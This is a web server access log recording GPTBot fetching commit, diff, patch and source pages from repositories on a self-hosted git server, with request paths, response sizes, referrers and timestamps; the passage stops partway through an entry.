"/windpacer/homepage/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec?show-outdated=&style=unified&whitespace=ignore-change" [Client 74.7.227.38] [Length 400463] [Gzip 13.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec" -[17/Feb/2026:13:00:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c?show-outdated=&style=unified&whitespace=ignore-all" [Client 74.7.227.38] [Length 196575] [Gzip 14.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c" -[17/Feb/2026:13:00:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/b288a964d15beae093be1af2456d67149d3aafa1?show-outdated=&style=unified&whitespace=ignore-change" [Client 74.7.227.38] [Length 136875] [Gzip 14.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commit/b288a964d15beae093be1af2456d67149d3aafa1" -[17/Feb/2026:13:00:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/90c7377285c0e63de46467557a2f081b33097f03" [Client 74.7.227.38] [Length 28926] [Gzip 6.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commit/b288a964d15beae093be1af2456d67149d3aafa1" -[17/Feb/2026:13:00:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/projects.sln" [Client 74.7.227.38] [Length 11695] [Gzip 3.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e" -[17/Feb/2026:13:00:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/.Notebook" [Client 74.7.227.38] [Length 10283] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e" -[17/Feb/2026:13:00:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a?show-outdated=&style=split&whitespace=show-all" [Client 74.7.227.38] [Length 62464] [Gzip 12.68] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a" -[17/Feb/2026:13:00:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a?show-outdated=&style=unified&whitespace=ignore-change" [Client 74.7.227.38] [Length 57836] [Gzip 10.64] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a" -[17/Feb/2026:13:00:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/fd51c36120e0bc559f08a35a65c69351c564222a?show-outdated=&style=unified&whitespace=ignore-change" [Client 74.7.227.38] [Length 191681] [Gzip 11.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commit/fd51c36120e0bc559f08a35a65c69351c564222a" -[17/Feb/2026:13:00:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e" [Client 74.7.227.38] [Length 229610] [Gzip 12.80] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer" -[17/Feb/2026:13:00:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6" [Client 74.7.227.38] [Length 56761] [Gzip 12.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584" -[17/Feb/2026:13:00:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c?show-outdated=&style=unified&whitespace=ignore-all" [Client 74.7.227.38] [Length 188157] [Gzip 11.34] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c" -[17/Feb/2026:13:00:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c?show-outdated=&style=split&whitespace=ignore-change" [Client 74.7.227.38] [Length 204105] [Gzip 13.71] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c?show-outdated=&style=unified&whitespace=ignore-change" -[17/Feb/2026:13:00:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c?show-outdated=&style=unified&whitespace=ignore-eol" [Client 74.7.227.38] [Length 188184] [Gzip 11.33] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c" -[17/Feb/2026:13:00:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/2681563c08aa04fbea2862fbca273762e67c16d6" [Client 74.7.227.38] [Length 77647] [Gzip 10.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commit/90c7377285c0e63de46467557a2f081b33097f03" -[17/Feb/2026:13:00:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commits/commit/3181052619700dceeeef81a9a0851130498f177e/projects.sln" [Client 74.7.227.38] [Length 9855] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/projects.sln" -[17/Feb/2026:13:00:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/raw/commit/3181052619700dceeeef81a9a0851130498f177e/projects.sln" [Client 74.7.227.38] [Length 1089] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/projects.sln" -[17/Feb/2026:13:00:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commits/commit/3181052619700dceeeef81a9a0851130498f177e/.Notebook" [Client 74.7.227.38] [Length 9858] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/.Notebook" -[17/Feb/2026:13:00:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/b288a964d15beae093be1af2456d67149d3aafa1?show-outdated=&style=unified&whitespace=ignore-eol" [Client 74.7.227.38] [Length 136885] [Gzip 14.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commit/b288a964d15beae093be1af2456d67149d3aafa1" -[17/Feb/2026:13:00:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/b288a964d15beae093be1af2456d67149d3aafa1?show-outdated=&style=split&whitespace=ignore-change" [Client 74.7.227.38] [Length 150532] [Gzip 17.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commit/b288a964d15beae093be1af2456d67149d3aafa1?show-outdated=&style=unified&whitespace=ignore-change" -[17/Feb/2026:13:00:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/b288a964d15beae093be1af2456d67149d3aafa1?show-outdated=&style=unified&whitespace=ignore-all" [Client 74.7.227.38] [Length 136878] [Gzip 14.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commit/b288a964d15beae093be1af2456d67149d3aafa1" -[17/Feb/2026:13:00:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2?show-outdated=&style=split&whitespace=ignore-change" [Client 74.7.227.38] [Length 24371] [Gzip 5.40] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2?show-outdated=&style=unified&whitespace=ignore-change" -[17/Feb/2026:13:00:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2?show-outdated=&style=unified&whitespace=ignore-eol" [Client 74.7.227.38] [Length 23186] [Gzip 4.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2" -[17/Feb/2026:13:00:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2?show-outdated=&style=unified&whitespace=ignore-all" [Client 74.7.227.38] [Length 23185] [Gzip 4.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2" -[17/Feb/2026:13:00:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d" [Client 74.7.227.38] [Length 15584] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec" -[17/Feb/2026:13:00:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/2681563c08aa04fbea2862fbca273762e67c16d6?show-outdated=&style=unified&whitespace=ignore-change" [Client 74.7.227.38] [Length 77475] [Gzip 10.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commit/2681563c08aa04fbea2862fbca273762e67c16d6" -[17/Feb/2026:13:00:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/fd51c36120e0bc559f08a35a65c69351c564222a.diff" [Client 74.7.227.38] [Length 857644] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commit/fd51c36120e0bc559f08a35a65c69351c564222a" -[17/Feb/2026:13:00:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977" [Client 74.7.227.38] [Length 115878] [Gzip 13.66] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commit/3e4db647c22a7292965a613e62ce815b9da823a8" -[17/Feb/2026:13:00:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commit/3181052619700dceeeef81a9a0851130498f177e.diff" [Client 74.7.227.38] [Length 268508] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/commit/3181052619700dceeeef81a9a0851130498f177e" -[17/Feb/2026:13:00:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/90c7377285c0e63de46467557a2f081b33097f03?show-outdated=&style=unified&whitespace=ignore-change" [Client 74.7.227.38] [Length 28975] [Gzip 6.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commit/90c7377285c0e63de46467557a2f081b33097f03" -[17/Feb/2026:13:00:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commit/3181052619700dceeeef81a9a0851130498f177e?show-outdated=&style=unified&whitespace=ignore-change" [Client 74.7.227.38] [Length 106877] [Gzip 12.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/commit/3181052619700dceeeef81a9a0851130498f177e" -[17/Feb/2026:13:00:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a" [Client 74.7.227.38] [Length 17031] [Gzip 3.31] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commit/fd51c36120e0bc559f08a35a65c69351c564222a" -[17/Feb/2026:13:00:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/998d733eb52423ffff2f8602efdfb1282198a61f?show-outdated=&style=unified&whitespace=ignore-eol" [Client 74.7.227.38] [Length 34285] [Gzip 7.58] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commit/998d733eb52423ffff2f8602efdfb1282198a61f" -[17/Feb/2026:13:00:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/998d733eb52423ffff2f8602efdfb1282198a61f?show-outdated=&style=unified&whitespace=ignore-all" [Client 74.7.227.38] [Length 34282] [Gzip 7.58] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commit/998d733eb52423ffff2f8602efdfb1282198a61f" -[17/Feb/2026:13:01:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/998d733eb52423ffff2f8602efdfb1282198a61f?show-outdated=&style=split&whitespace=ignore-change" [Client 74.7.227.38] [Length 36008] [Gzip 9.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commit/998d733eb52423ffff2f8602efdfb1282198a61f?show-outdated=&style=unified&whitespace=ignore-change" -[17/Feb/2026:13:01:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/63aec54418d3c1735d68bf046c7a9e78a247798d" [Client 74.7.227.38] [Length 22180] [Gzip 4.71] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d" -[17/Feb/2026:13:01:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d?show-outdated=&style=unified&whitespace=ignore-change" [Client 74.7.227.38] [Length 15642] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d" -[17/Feb/2026:13:01:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d?show-outdated=&style=unified&whitespace=ignore-eol" [Client 74.7.227.38] [Length 15644] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d" -[17/Feb/2026:13:01:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a" [Client 74.7.227.38] [Length 19811] [Gzip 4.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977" -[17/Feb/2026:13:01:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d?show-outdated=&style=unified&whitespace=ignore-all" [Client 74.7.227.38] [Length 15644] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d" -[17/Feb/2026:13:01:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/fd51c36120e0bc559f08a35a65c69351c564222a.patch" [Client 74.7.227.38] [Length 17952097] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commit/fd51c36120e0bc559f08a35a65c69351c564222a" -[17/Feb/2026:13:01:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commit/3181052619700dceeeef81a9a0851130498f177e?show-outdated=&style=split&whitespace=ignore-change" [Client 74.7.227.38] [Length 120356] [Gzip 14.36] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/commit/3181052619700dceeeef81a9a0851130498f177e?show-outdated=&style=unified&whitespace=ignore-change" -[17/Feb/2026:13:01:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm" [Client 74.7.227.38] [Length 10203] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a" -[17/Feb/2026:13:01:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html" [Client 74.7.227.38] [Length 14309] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a" -[17/Feb/2026:13:01:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/nginx.conf" [Client 74.7.227.38] [Length 11957] [Gzip 3.36] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a" -[17/Feb/2026:13:01:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.gitignore" [Client 74.7.227.38] [Length 10963] [Gzip 2.93] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a" -[17/Feb/2026:13:01:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/63aec54418d3c1735d68bf046c7a9e78a247798d?show-outdated=&style=unified&whitespace=ignore-change" [Client 74.7.227.38] [Length 22229] [Gzip 4.70] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commit/63aec54418d3c1735d68bf046c7a9e78a247798d" -[17/Feb/2026:13:01:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d?show-outdated=&style=split&whitespace=ignore-change" [Client 74.7.227.38] [Length 15593] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d?show-outdated=&style=unified&whitespace=ignore-change" -[17/Feb/2026:13:01:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/find/commit/fd51c36120e0bc559f08a35a65c69351c564222a" [Client 74.7.227.38] [Length 7492] [Gzip 2.66] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a" -[17/Feb/2026:13:01:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d" [Client 74.7.227.38] [Length 15424] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a" -[17/Feb/2026:13:01:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a" [Client 74.7.227.38] [Length 11666] [Gzip 4.94] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a" -[17/Feb/2026:13:01:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/blame/commit/3181052619700dceeeef81a9a0851130498f177e/projects.sln" [Client 74.7.227.38] [Length 10945] [Gzip 4.20] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/projects.sln" -[17/Feb/2026:13:01:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03" [Client 74.7.227.38] [Length 17038] [Gzip 3.30] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commit/90c7377285c0e63de46467557a2f081b33097f03" -[17/Feb/2026:13:01:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/avatars/a16511949167cdebe904492446eff88b?size=36" [Client 74.7.227.38] [Length 2182] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/blame/commit/3181052619700dceeeef81a9a0851130498f177e/projects.sln" -[17/Feb/2026:13:01:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data" [Client 74.7.227.38] [Length 10804] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm" -[17/Feb/2026:13:01:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/components" [Client 74.7.227.38] [Length 10563] [Gzip 3.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html" -[17/Feb/2026:13:01:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/services" [Client 74.7.227.38] [Length 9914] [Gzip 2.83] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html" -[17/Feb/2026:13:01:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html" [Client 74.7.227.38] [Length 11610] [Gzip 5.67] [Sent-to 